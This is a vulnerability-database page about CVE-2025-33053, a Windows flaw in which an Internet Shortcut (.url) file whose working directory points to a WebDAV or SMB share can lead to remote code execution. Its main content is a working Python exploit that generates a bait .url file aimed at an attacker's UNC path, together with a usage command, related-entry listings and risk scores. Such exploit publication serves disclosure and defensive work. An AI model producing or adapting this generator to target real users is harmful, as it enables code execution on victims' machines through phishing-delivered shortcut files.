📄 Microsoft Windows 10 WebDAV Remote Code Execution

🗓️ 17 Jun 2025 00:00:00Reported by Dev Bui HieuType

Exploits Windows WebDAV via .url shortcuts to trigger remote code execution when opened.

Reporter	Title	Published	Views	Family All 69
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	18 Dec 202509:00	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	18 Jun 202510:08	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	23 Aug 202501:37	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	12 Jun 202506:48	–	githubexploit
GithubExploit	Exploit for External Control of File Name or Path in Microsoft	18 Jun 202519:39	–	githubexploit
ATTACKERKB	CVE-2025-33053	10 Jun 202500:00	–	attackerkb
Information Security Automation	July “In the Trend of VM” (#17): vulnerabilities in Microsoft Windows and Roundcube	21 Jul 202516:30	–	avleonov
Information Security Automation	About Remote Code Execution – Internet Shortcut Files (CVE-2025-33053) vulnerability	21 Jul 202511:50	–	avleonov
Information Security Automation	June Microsoft Patch Tuesday	10 Jun 202521:49	–	avleonov
Circl	CVE-2025-33053	10 Jun 202515:24	–	circl

Exploit Title: WebDAV Windows 10 - Remote Code Execution (RCE)
    Date: June 2025
    Author: Dev Bui Hieu
    Tested on: Windows 10, Windows 11
    Platform: Windows
    Type: Remote
    CVE: CVE-2025-33053
    
    Description:
    This exploit leverages the behavior of Windows .URL files to execute a
    remote binary over a UNC path. When a victim opens or previews the .URL
    file (e.g. from email), the system may automatically reach out to the
    specified path (e.g. WebDAV or SMB share), leading to arbitrary code
    execution without prompt.
    
    ```bash
    python3 gen_url.py --ip 192.168.1.100 --out doc.url
    ```
    
    import argparse
    
    def generate_url_file(output_file, url_target, working_directory, icon_file, icon_index, modified):
        content = f"""[InternetShortcut]
    URL={url_target}
    WorkingDirectory={working_directory}
    ShowCommand=7
    IconIndex={icon_index}
    IconFile={icon_file}
    Modified={modified}
    """
        with open(output_file, "w", encoding="utf-8") as f:
            f.write(content)
        print(f"[+] .url file created: {output_file}")
    
    def main():
        parser = argparse.ArgumentParser(description="Generate a malicious .url file (UNC/WebDAV shortcut)")
        
        parser.add_argument('--out', default="bait.url", help="Output .url file name")
        parser.add_argument('--ip', required=True, help="Attacker IP address or domain name for UNC/WebDAV path")
        parser.add_argument('--share', default="webdav", help="Shared folder name (default: webdav)")
        parser.add_argument('--exe', default=r"C:\Program Files\Internet Explorer\iediagcmd.exe",
                            help="Target executable path on victim machine")
        parser.add_argument('--icon', default=r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
                            help="Icon file path")
        parser.add_argument('--index', type=int, default=13, help="Icon index (default: 13)")
        parser.add_argument('--modified', default="20F06BA06D07BD014D", help="Fake Modified timestamp (hex string)")
    
        args = parser.parse_args()
    
        working_directory = fr"\\{args.ip}\{args.share}\\"
    
        generate_url_file(
            output_file=args.out,
            url_target=args.exe,
            working_directory=working_directory,
            icon_file=args.icon,
            icon_index=args.index,
            modified=args.modified
        )
    
    if __name__ == "__main__":
        main()

17 Jun 2025 00:00Current

8.4High risk

Vulners AI Score8.4

CVSS 3.18.8

EPSS0.50282